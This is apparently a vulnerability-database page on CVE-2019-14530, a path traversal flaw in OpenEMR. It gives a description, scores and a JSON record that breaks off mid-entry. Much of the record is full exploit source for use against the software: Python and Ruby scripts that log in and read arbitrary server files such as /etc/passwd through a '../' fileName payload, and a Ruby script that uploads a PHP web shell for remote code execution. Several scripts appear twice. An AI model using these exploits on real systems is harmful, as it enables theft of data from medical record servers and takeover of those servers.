Description
An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable by the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from the server.
**Recent assessments:**
**noraj** at July 08, 2021 7:42pm UTC reported:
* Title: OpenEMR < 5.0.2 – (Authenticated) Path Traversal – Local File Disclosure
* Vulnerable version: < 5.0.2 (i.e., every release up to and including 5.0.1.7)
* Patch: <https://github.com/openemr/openemr/pull/2592/files>
* Docker PoC: <https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml>
Assessed Attacker Value: 4
Assessed Attacker Value: 4
Assessed Attacker Value: 4
Related
{"id": "AKB:CC8965D5-97BC-4618-BABB-A087A2406B74", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2019-14530", "description": "An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.\n\n \n**Recent assessments:** \n \n**noraj** at July 08, 2021 7:42pm UTC reported:\n\n * Title: OpenEMR < 5.0.2 \u2013 (Authenticated) Path Traversal \u2013 Local File Disclosure \n\n * Vulnerable version: < 5.0.2 (it means up to 5.0.1.7) \n\n * Patch: <https://github.com/openemr/openemr/pull/2592/files> \n\n * Docker PoC: <https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml> \n\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "published": "2019-08-13T00:00:00", "modified": "2020-06-05T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "href": "https://attackerkb.com/topics/M8KwhNKjmJ/cve-2019-14530", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14530", "https://github.com/sec-it/exploit-CVE-2019-14530", "https://github.com/openemr/openemr/pull/2592", "https://github.com/Wezery/CVE-2019-14530", "http://packetstormsecurity.com/files/163215/OpenEMR-5.0.1.7-Path-Traversal.html", "http://packetstormsecurity.com/files/163375/OpenEMR-5.0.1.7-Path-Traversal.html"], "cvelist": ["CVE-2019-14530"], "immutableFields": [], "lastseen": "2021-07-20T20:08:55", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-14530"]}, {"type": "exploitdb", "idList": ["EDB-ID:50037", "EDB-ID:50087", "EDB-ID:50122"]}, {"type": "githubexploit", "idList": ["9B456B35-97DF-53EE-B56C-AA10A7CE7F5E", 
"BF123FAC-E699-5CD0-8741-C391F80816EA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142700"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163215", "PACKETSTORM:163375", "PACKETSTORM:163482"]}, {"type": "zdt", "idList": ["1337DAY-ID-36449", "1337DAY-ID-36507", "1337DAY-ID-36549"]}], "rev": 4}, "score": {"value": 1.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2019-14530"]}, {"type": "exploitdb", "idList": ["EDB-ID:50037"]}, {"type": "githubexploit", "idList": ["9B456B35-97DF-53EE-B56C-AA10A7CE7F5E", "BF123FAC-E699-5CD0-8741-C391F80816EA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142700"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163215"]}, {"type": "zdt", "idList": ["1337DAY-ID-36449", "1337DAY-ID-36507", "1337DAY-ID-36549"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-14530", "epss": "0.947480000", "percentile": "0.987590000", "modified": "2023-03-17"}], "vulnersScore": 1.4}, "attackerkb": {"attackerValue": 4, "exploitability": 4}, "wildExploited": false, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14530"], "Exploit": ["https://github.com/sec-it/exploit-CVE-2019-14530"], "Miscellaneous": ["https://github.com/openemr/openemr/pull/2592", "https://github.com/Wezery/CVE-2019-14530", "http://packetstormsecurity.com/files/163215/OpenEMR-5.0.1.7-Path-Traversal.html", "http://packetstormsecurity.com/files/163375/OpenEMR-5.0.1.7-Path-Traversal.html"]}, "tags": ["easy_to_develop", "default_configuration", "post_auth"], "mitre_vector": {"Initial Access": ["Exploit Public-Facing Application(Validated)"]}, "last_activity": "2021-07-08T19:42:00", "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", 
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "edition": 2, "scheme": null, "_state": {"wildexploited": 1647356732, "dependencies": 1645995693, "score": 1684008354, "epss": 1679098904}, "_internal": {"wildexploited_cvelist": null, "score_hash": "296b05f579a35de62114aac0ed3e7fbd"}}
{"githubexploit": [{"lastseen": "2022-02-10T21:12:03", "description": "# CVE-2019-14530\n\nPath traversal and DoS vulnerability in OpenEM...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T01:33:11", "type": "githubexploit", "title": "Exploit for Path Traversal in Open-Emr Openemr", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2022-01-09T21:00:36", "id": "9B456B35-97DF-53EE-B56C-AA10A7CE7F5E", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-10T21:28:35", "description": "# OpenEMR CVE-2019-14530 exploit\n\n> OpenEMR < 5.0.2 - (Authentic...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-30T08:59:57", 
"type": "githubexploit", "title": "Exploit for Path Traversal in Open-Emr Openemr", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2021-07-08T19:35:09", "id": "BF123FAC-E699-5CD0-8741-C391F80816EA", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "privateArea": 1}], "packetstorm": [{"lastseen": "2021-06-22T19:45:45", "description": "", "cvss3": {}, "published": "2021-06-18T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.7 Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-14530"], "modified": "2021-06-18T00:00:00", "id": "PACKETSTORM:163215", "href": "https://packetstormsecurity.com/files/163215/OpenEMR-5.0.1.7-Path-Traversal.html", "sourceData": "`# Exploit Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) \n# Date 16.06.2021 \n# Exploit Author: Ron Jost (Hacker5preme) \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip \n# Version: All versions prior to 5.0.2 \n# Tested on: Ubuntu 18.04 \n# CVE: CVE-2019-14530 \n# CWE: CWE-22 \n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2019-14530-Exploit/README.md \n# Reference: https://raw.githubusercontent.com/Wezery/CVE-2019-14530/master/Path%20traversal%20and%20DoS.pdf \n \n''' \nDescription: \nAn issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. 
\nAn authenticated attacker can download any file (that is readable by the user www-data) \nfrom server storage. If the requested file is writable for the www-data user and the directory \n/var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server. \n''' \n \n \n''' \nBanner: \n''' \nbanner = \"\"\" \n \n \n______ _______ ____ ___ _ ___ _ _ _ ____ _____ ___ \n/ ___\\ \\ / / ____| |___ \\ / _ \\/ |/ _ \\ / | || || ___|___ / / _ \\ \n| | \\ \\ / /| _| _____ __) | | | | | (_) |_____| | || ||___ \\ |_ \\| | | | \n| |___ \\ V / | |__|_____/ __/| |_| | |\\__, |_____| |__ _|__) |__) | |_| | \n\\____| \\_/ |_____| |_____|\\___/|_| /_/ |_| |_||____/____/ \\___/ \n \nby Hacker5preme \n \n\"\"\" \nprint(banner) \n \n \n''' \nImport required modules: \n''' \nimport requests \nimport argparse \n \n \n''' \nUser-Input: \n''' \nmy_parser = argparse.ArgumentParser(description='OpenEMR Path Traversal') \nmy_parser.add_argument('-T', '--IP', type=str) \nmy_parser.add_argument('-P', '--PORT', type=str) \nmy_parser.add_argument('-U', '--PATH', type=str) \nmy_parser.add_argument('-u', '--USERNAME', type=str) \nmy_parser.add_argument('-p', '--PASSWORD', type=str) \nargs = my_parser.parse_args() \ntarget_ip = args.IP \ntarget_port = args.PORT \nopenemr_path = args.PATH \nusername = args.USERNAME \npassword = args.PASSWORD \nprint('') \nFilepath = input('[+] Filepath: ') \n \n \n''' \nAuthentication: \n''' \nsession = requests.Session() \nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default' \n \n# Header: \nheader = { \n'Host': target_ip, \n'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', \n'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', \n'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', \n'Accept-Encoding': 'gzip, deflate', \n'Content-Type': 'application/x-www-form-urlencoded', \n'Origin': 'http://' + 
target_ip, \n'Connection': 'close', \n'Upgrade-Insecure-Requests': '1' \n} \n \n# Body: \nbody = { \n'new_login_session_management': '1', \n'authProvider': 'Default', \n'authUser': username, \n'clearPass': password, \n'languageChoice': '1' \n} \n \n# Authenticate: \nprint('') \nauth = session.post(auth_url, headers=header, data=body) \nif 'error=1&site=' in auth.text: \nprint('[-] Authentication failed') \nexit() \nelse: \nprint('[+] Authentication successfull: ' + str(auth)) \n \n \n''' \nPath Traversal: \n''' \nurl_static = 'http://' + target_ip + ':' + target_port + openemr_path \nurl_dynamic = '/custom/ajax_download.php?fileName=../../../../../../../../..' \nurl_exploit = url_static + url_dynamic + Filepath \nprint('') \nprint('[+] Constructed malicious URL: ') \n \n# Headers: \nheader = { \n'Host': target_ip, \n'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', \n'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', \n'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', \n'Accept-Encoding': 'gzip, deflate', \n'Connection': 'close', \n'Upgrade-Insecure-Requests': '1' \n} \n \n# Exploit: \nprint('') \nprint('[+] Contents of ' + Filepath + ':') \nprint('') \ngetfile = session.get(url_exploit, headers = header) \nprint(getfile.text) \n \n`\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/163215/openemr5017-traversal.txt"}, {"lastseen": "2021-07-05T17:16:09", "description": "", "cvss3": {}, "published": "2021-07-05T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.7 Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-14530"], "modified": "2021-07-05T00:00:00", "id": "PACKETSTORM:163375", "href": "https://packetstormsecurity.com/files/163375/OpenEMR-5.0.1.7-Path-Traversal.html", "sourceData": "`# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2) \n# Exploit 
author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr) \n# Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530 \n# Date: 2021-06-24 \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz \n# Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml \n# Version: < 5.0.2 (it means up to 5.0.1.7) \n# Tested on: OpenEMR Version 5.0.1 \n# References: https://www.exploit-db.com/exploits/50037 \n# CVE: CVE-2019-14530 \n# CWE: CWE-22 \n# Patch: https://github.com/openemr/openemr/pull/2592/files \n \n#!/usr/bin/env ruby \n \nrequire 'pathname' \nrequire 'httpx' \nrequire 'docopt' \n \ndoc = <<~DOCOPT \nOpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure \n \nSource: https://github.com/sec-it/exploit-CVE-2019-14530 \n \nUsage: \n#{__FILE__} exploit <url> <filename> <username> <password> [--debug] \n#{__FILE__} -h | --help \n \nOptions: \n<url> Root URL (base path) including HTTP scheme, port and root folder \n<filename> Filename of the file to be read \n<username> Username of the admin \n<password> Password of the admin \n--debug Display arguments \n-h, --help Show this screen \n \nExamples: \n#{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass \n#{__FILE__} exploit https://example.org:5000/ /etc/passwd admin pass \nDOCOPT \n \ndef login(root_url, user, pass, http) \nvuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\" \nparams = { \n'new_login_session_management' => '1', \n'authProvider' => 'Default', \n'authUser' => user, \n'clearPass' => pass, \n'languageChoice' => '1' \n} \n \nhttp.post(vuln_url, form: params).body.to_s \nend \n \ndef exploit(root_url, filename, http) \nvuln_url = \"#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#(unknown)\" \n \nhttp.get(vuln_url).body.to_s \nend \n \nbegin \nargs = Docopt.docopt(doc) \npp args if args['--debug'] \n \nif 
args['exploit'] \nhttp = HTTPX.plugin(:cookies).plugin(:follow_redirects) \nlogin(args['<url>'], args['<username>'], args['<password>'], http) \nputs exploit(args['<url>'], args['<filename>'], http) \nend \nrescue Docopt::Exit => e \nputs e.message \nend \n \n`\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/163375/openemr5017fn-traversal.txt"}, {"lastseen": "2021-07-13T16:00:46", "description": "", "cvss3": {}, "published": "2021-07-13T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.3 Shell Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "PACKETSTORM:163482", "href": "https://packetstormsecurity.com/files/163482/OpenEMR-5.0.1.3-Shell-Upload.html", "sourceData": "`# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2) \n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr) \n# Date: 2021-07-05 \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz \n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml \n# Version: < 5.0.1.4 (it means up to 5.0.1.3) \n# Tested on: OpenEMR Version 5.0.0.8 \n# References: https://www.exploit-db.com/exploits/49998 \n# CVE: CVE-2018-15139 \n# CWE: CWE-434 \n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485 \n \n#!/usr/bin/env ruby \n \nrequire 'pathname' \nrequire 'httpx' \nrequire 'http/form_data' \nrequire 'docopt' \n \ndoc = <<~DOCOPT \nOpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution \n \nSource: https://github.com/sec-it/exploit-CVE-2019-14530 \n \nUsage: \n#{__FILE__} exploit <url> <filename> <username> <password> [--debug] \n#{__FILE__} -h | --help \n \nOptions: \n<url> Root URL (base path) including HTTP 
scheme, port and root folder \n<filename> Filename of the shell to be uploaded \n<username> Username of the admin \n<password> Password of the admin \n--debug Display arguments \n-h, --help Show this screen \n \nExamples: \n#{__FILE__} exploit http://example.org/openemr shell.php admin pass \n#{__FILE__} exploit https://example.org:5000/ shell.php admin pass \nDOCOPT \n \ndef login(root_url, user, pass, http) \nvuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\" \nparams = { \n'new_login_session_management' => '1', \n'authProvider' => 'Default', \n'authUser' => user, \n'clearPass' => pass, \n'languageChoice' => '1' \n} \n \nhttp.post(vuln_url, form: params).body.to_s \nend \n \ndef upload(root_url, filepath, http) \nvuln_url = \"#{root_url}/interface/super/manage_site_files.php\" \npn = Pathname.new(filepath) \n \nparams = { \nform_image: { \ncontent_type: 'application/x-php', \nfilename: pn.basename.to_s, \nbody: pn \n}, \nbn_save: 'Save' \n} \n \nres = http.post(vuln_url, form: params) \n \nreturn '[-] File not upload' unless (200..299).include?(res.status) \n \n\"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\" \nend \n \nbegin \nargs = Docopt.docopt(doc) \npp args if args['--debug'] \n \nif args['exploit'] \nhttp = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart) \nlogin(args['<url>'], args['<username>'], args['<password>'], http) \nputs upload(args['<url>'], args['<filename>'], http) \nend \nrescue Docopt::Exit => e \nputs e.message \nend \n \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/163482/openemr5013msf-shell.txt"}], "zdt": [{"lastseen": "2021-12-04T15:55:50", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", 
"integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2021-06-21T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.7 - (fileName) Path Traversal (Authenticated) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2021-06-21T00:00:00", "id": "1337DAY-ID-36449", "href": "https://0day.today/exploit/description/36449", "sourceData": "# Exploit Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated)\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip\n# Version: All versions prior to 5.0.2\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2019-14530\n# CWE: CWE-22\n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2019-14530-Exploit/README.md\n# Reference: https://raw.githubusercontent.com/Wezery/CVE-2019-14530/master/Path%20traversal%20and%20DoS.pdf\n\n'''\nDescription:\nAn issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter.\nAn authenticated attacker can download any file (that is readable by the user www-data)\nfrom server storage. 
If the requested file is writable for the www-data user and the directory\n/var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.\n'''\n\n\n'''\nBanner:\n'''\nbanner = \"\"\" \n \n \n ______ _______ ____ ___ _ ___ _ _ _ ____ _____ ___ \n / ___\\ \\ / / ____| |___ \\ / _ \\/ |/ _ \\ / | || || ___|___ / / _ \\ \n| | \\ \\ / /| _| _____ __) | | | | | (_) |_____| | || ||___ \\ |_ \\| | | |\n| |___ \\ V / | |__|_____/ __/| |_| | |\\__, |_____| |__ _|__) |__) | |_| |\n \\____| \\_/ |_____| |_____|\\___/|_| /_/ |_| |_||____/____/ \\___/ \n \n by Hacker5preme\n \n\"\"\"\nprint(banner)\n\n\n'''\nImport required modules:\n'''\nimport requests\nimport argparse\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Path Traversal')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\nprint('')\nFilepath = input('[+] Filepath: ')\n\n\n'''\nAuthentication:\n'''\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'\n\n# Header:\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Upgrade-Insecure-Requests': '1'\n}\n\n# Body:\nbody = {\n 'new_login_session_management': '1',\n 'authProvider': 
'Default',\n 'authUser': username,\n 'clearPass': password,\n 'languageChoice': '1'\n}\n\n# Authenticate:\nprint('')\nauth = session.post(auth_url, headers=header, data=body)\nif 'error=1&site=' in auth.text:\n print('[-] Authentication failed')\n exit()\nelse:\n print('[+] Authentication successfull: ' + str(auth))\n\n\n'''\nPath Traversal:\n'''\nurl_static = 'http://' + target_ip + ':' + target_port + openemr_path\nurl_dynamic = '/custom/ajax_download.php?fileName=../../../../../../../../..'\nurl_exploit = url_static + url_dynamic + Filepath\nprint('')\nprint('[+] Constructed malicious URL: ')\n\n# Headers:\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Connection': 'close',\n 'Upgrade-Insecure-Requests': '1'\n}\n\n# Exploit:\nprint('')\nprint('[+] Contents of ' + Filepath + ':')\nprint('')\ngetfile = session.get(url_exploit, headers = header)\nprint(getfile.text)\n", "sourceHref": "https://0day.today/exploit/36449", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-22T15:29:26", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2021-07-05T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.7 - (fileName) Path Traversal (Authenticated) Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2021-07-05T00:00:00", "id": "1337DAY-ID-36507", "href": "https://0day.today/exploit/description/36507", "sourceData": "# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml\n# Version: < 5.0.2 (it means up to 5.0.1.7)\n# Tested on: OpenEMR Version 5.0.1\n# References: https://www.exploit-db.com/exploits/50037\n# CVE: CVE-2019-14530\n# CWE: CWE-22\n# Patch: https://github.com/openemr/openemr/pull/2592/files\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of the file to be read\n <username> Username of the admin\n <password> Password of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass\n #{__FILE__} exploit https://example.org:5000/ /etc/passwd admin 
pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef exploit(root_url, filename, http)\n vuln_url = \"#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#(unknown)\"\n\n http.get(vuln_url).body.to_s\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts exploit(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend\n", "sourceHref": "https://0day.today/exploit/36507", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-20T11:35:52", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": 